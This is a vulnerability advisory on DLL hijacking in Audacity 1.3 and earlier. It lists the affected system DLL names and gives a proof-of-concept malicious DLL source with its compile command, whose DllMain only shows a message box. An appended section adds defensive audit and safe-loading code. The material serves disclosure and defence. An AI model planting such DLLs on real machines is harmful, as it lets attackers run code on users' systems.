Audacity <= 1.3 DLL Hijacking Vulnerability

Name             : Audacity
Vendor           : http://audacity.sourceforge.net
Versions Affected: <= 1.3 Beta
Author           : Salvatore Fresta aka Drosophila
Website          : http://www.salvatorefresta.net
Contact          : salvatorefresta [at] gmail [dot] com
Date             : 2010-10-29

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

Audacity is free, open source software for recording and editing sounds.

II. DESCRIPTION
_______________

The vulnerability is caused by the application loading libraries in an insecure manner.

I tested versions 1.2.6 (stable) and 1.3 Beta. Other versions could be vulnerable.

III. ANALYSIS
_____________

Summary:

A) DLL Hijacking

A) DLL Hijacking
________________

By default, Audacity's installation folder does not contain any DLL files. When the application tries to load certain DLLs, it looks first in the installation directory and only then in the system32 directory. Because of this, it is possible to hijack the load operation so that a malicious DLL with the same name is loaded instead of the system one.

The following is the list of affected DLLs:

wintrust.dll
msasn1.dll
msacm32.dll
midimap.dll
wsock32.dll
ws2_32.dll
ws2help.dll
winmm.dll
lpk.dll
usp10.dll
setupapi.dll
crypt32.dll

IV. SAMPLE CODE
_______________

A) DLL Hijacking

The following is the sample code (evil.c) for wintrust.dll; the output file name must match the DLL being replaced:

    // compile: gcc -shared -o wintrust.dll evil.c
    #include <windows.h>

    // Runs when the DLL is attached; shows a message box as proof of loading.
    BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    {
        MessageBox(0, "DLL Hijacking!", "Salvatore Fresta", MB_OK);
        return TRUE;
    }

V. FIX
______

No fix.
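As an added illustration of the search-order issue described in section III (not part of the original advisory), the following C code does two things a defender would want: an audit function that flags any file in the install directory whose name collides with one of the listed system DLLs, and, on Windows only, a loader that resolves such a DLL by its full system32 path so the install directory is never consulted. The directory listing passed to the audit is constructed by the caller; the function and file names are mine, not Audacity's.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#ifdef _WIN32
#include <wchar.h>
#include <windows.h>
#endif

/* DLL names the advisory lists as resolved from the install directory first. */
static const char *const AFFECTED_DLLS[] = {
    "wintrust.dll", "msasn1.dll", "msacm32.dll", "midimap.dll",
    "wsock32.dll", "ws2_32.dll", "ws2help.dll", "winmm.dll",
    "lpk.dll", "usp10.dll", "setupapi.dll", "crypt32.dll"
};
#define AFFECTED_COUNT (sizeof AFFECTED_DLLS / sizeof AFFECTED_DLLS[0])

/* Windows file names are case-insensitive, so compare that way. */
static int name_eq(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == '\0' && *b == '\0';
}

/* Audit: `entries` holds the file names found in the install directory
 * (constructed by the caller).  Each name colliding with an affected DLL is
 * a planted candidate; it is copied to `found` (up to `max`).  Returns the count. */
size_t audit_install_dir(const char *const *entries, size_t n,
                         const char **found, size_t max) {
    size_t hits = 0;
    for (size_t i = 0; i < n && hits < max; i++)
        for (size_t j = 0; j < AFFECTED_COUNT; j++)
            if (name_eq(entries[i], AFFECTED_DLLS[j])) {
                found[hits++] = entries[i];
                break;
            }
    return hits;
}
#ifdef _WIN32
/* Mitigation for the application side: load a system DLL by its full path
 * under the system directory, so the install directory is never searched. */
HMODULE load_system_dll(const wchar_t *name) {
    wchar_t path[MAX_PATH];
    UINT len = GetSystemDirectoryW(path, MAX_PATH);
    if (len == 0 || len + wcslen(name) + 2 > MAX_PATH) return NULL;
    path[len] = L'\\';
    wcscpy(path + len + 1, name);
    return LoadLibraryW(path);   /* e.g. load_system_dll(L"wintrust.dll") */
}
#endif
```

The audit part compiles and runs on any platform, so it can also be run over a directory listing exported from the affected machine.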